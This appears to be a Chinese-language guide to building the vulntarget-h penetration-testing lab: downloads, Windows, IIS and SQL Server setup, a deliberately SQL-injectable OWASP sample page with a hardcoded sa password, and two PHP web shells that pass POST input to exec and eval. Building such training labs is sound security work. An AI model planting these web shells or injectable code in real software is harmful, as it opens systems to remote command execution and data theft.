vuntarget免責聲明
00
相關(guān)漏洞技術(shù)
sql注入、文件包含、命令執(zhí)行,免殺等漏洞利用、隧道代理等
下載地址
百度云鏈接
https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q
提取碼:1p9p
其中vulntarget-h是本次環(huán)境
github地址:
https://github.com/crow821/vulntarget
測試說明
1. 鏡像都是基于VM16做的,沒有向下兼容
2. 操作人員自行修改對應(yīng)IP
3. 下載靶機,開機之后,確認自己網(wǎng)絡(luò)配置好了,可以選擇本地做一個快照,原本的快照可能會因為制作靶機的處理器和當前打開靶機的處理器不一致,導(dǎo)致快照恢復(fù)失敗,或者異常(見諒)
拓撲圖
01
vulntarget-h賬密
02
環(huán)境搭建
點擊確定
下一步->下一步->安裝->下一步->下一步
到這里全選繼續(xù)下一步->下一步->下一步
對所有用戶使用相同賬戶
輸入管理員賬號密碼
最后改成自動
輸入sa密碼,添加administrator賬戶
添加賬號
然后一直下一步到安裝就好了
2.windows 2008 IIS安裝
勾選web服務(wù)器(IIS)
直接滾鍵盤,再回到管理網(wǎng)站選擇重新啟動
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx
下載下來后刪掉13行,修改47行的密碼
private static string strSqlConnectionString = @'SERVER=.;UID=sa;PWD=Adminweishenmezhegehaiyaomima@;DATABASE=FoundStone_Bank';
點擊默認文檔
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql
點擊數(shù)據(jù)庫右鍵新建數(shù)據(jù)庫,創(chuàng)建一個名為FoundStone_Bank的數(shù)據(jù)庫
點擊新建查詢復(fù)制配置文件
最后回到首頁用參數(shù)測試一下
這樣就成功了
這就不寫了
<?php
highlight_file(__FILE__);
exec($_POST['shell']);
//路過的腳本小子留下了一個后門,讀一下c:\phpstudy_pro\a.txt吧里面有好東西
?>
<?php
highlight_file(__FILE__);
eval($_POST['shell']);
?>
設(shè)置網(wǎng)站目錄不可寫,幾個用戶都修改
安裝火絨
然后是常規(guī)的安裝